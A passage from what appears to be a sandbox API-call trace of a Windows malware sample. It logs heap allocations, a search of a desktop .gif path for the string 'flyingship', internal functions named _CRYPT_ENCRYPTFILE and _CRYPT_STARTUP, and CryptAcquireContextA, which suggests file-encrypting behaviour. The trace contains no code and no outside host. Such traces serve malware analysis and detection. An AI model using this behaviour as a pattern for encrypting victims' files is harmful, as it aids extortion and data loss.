(in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0165.594] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0165.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0165.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0165.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0165.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0165.595] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf556c8a0, ftCreationTime.dwHighDateTime=0x1d5da4d, ftLastAccessTime.dwLowDateTime=0xfb4c46b0, ftLastAccessTime.dwHighDateTime=0x1d5e51d, ftLastWriteTime.dwLowDateTime=0xfb4c46b0, ftLastWriteTime.dwHighDateTime=0x1d5e51d, nFileSizeHigh=0x0, nFileSizeLow=0x1565f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="R4ko9W2ZwNtIqWlJH0ER.gif", cAlternateFileName="R4KO9W~1.GIF")) returned 0x90add8 [0165.596] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0165.596] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0165.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0165.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0165.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0165.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0165.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0165.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0165.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.597] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf556c8a0, ftCreationTime.dwHighDateTime=0x1d5da4d, ftLastAccessTime.dwLowDateTime=0xfb4c46b0, ftLastAccessTime.dwHighDateTime=0x1d5e51d, ftLastWriteTime.dwLowDateTime=0xfb4c46b0, ftLastWriteTime.dwHighDateTime=0x1d5e51d, nFileSizeHigh=0x0, nFileSizeLow=0x1565f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="R4ko9W2ZwNtIqWlJH0ER.gif", cAlternateFileName="R4KO9W~1.GIF")) returned 0x90add8 [0165.597] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0165.597] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0165.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0165.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0165.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0165.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ko9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZwNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wNtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NtIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tIqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IqWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qWlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WlJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lJH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JH0ER.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.599] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0165.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0165.599] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0165.599] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0165.599] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0165.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0165.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0165.599] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0165.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0165.600] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0165.600] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0165.600] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0165.600] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0165.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.gif", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf556c8a0, ftCreationTime.dwHighDateTime=0x1d5da4d, ftLastAccessTime.dwLowDateTime=0xfb4c46b0, ftLastAccessTime.dwHighDateTime=0x1d5e51d, ftLastWriteTime.dwLowDateTime=0xfb4c46b0, ftLastWriteTime.dwHighDateTime=0x1d5e51d, nFileSizeHigh=0x0, nFileSizeLow=0x1565f, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="R4ko9W2ZwNtIqWlJH0ER.gif", cAlternateFileName="R4KO9W~1.GIF")) returned 0x90ae18 [0165.600] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0165.600] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0165.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0165.600] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0165.600] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.601] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.601] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0165.601] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0165.601] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0165.601] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.601] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0165.601] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0165.601] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0165.601] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0165.601] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0165.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0165.602] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0165.602] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.602] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0165.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0166.803] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0166.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0166.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0166.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0166.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0166.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0166.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0166.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 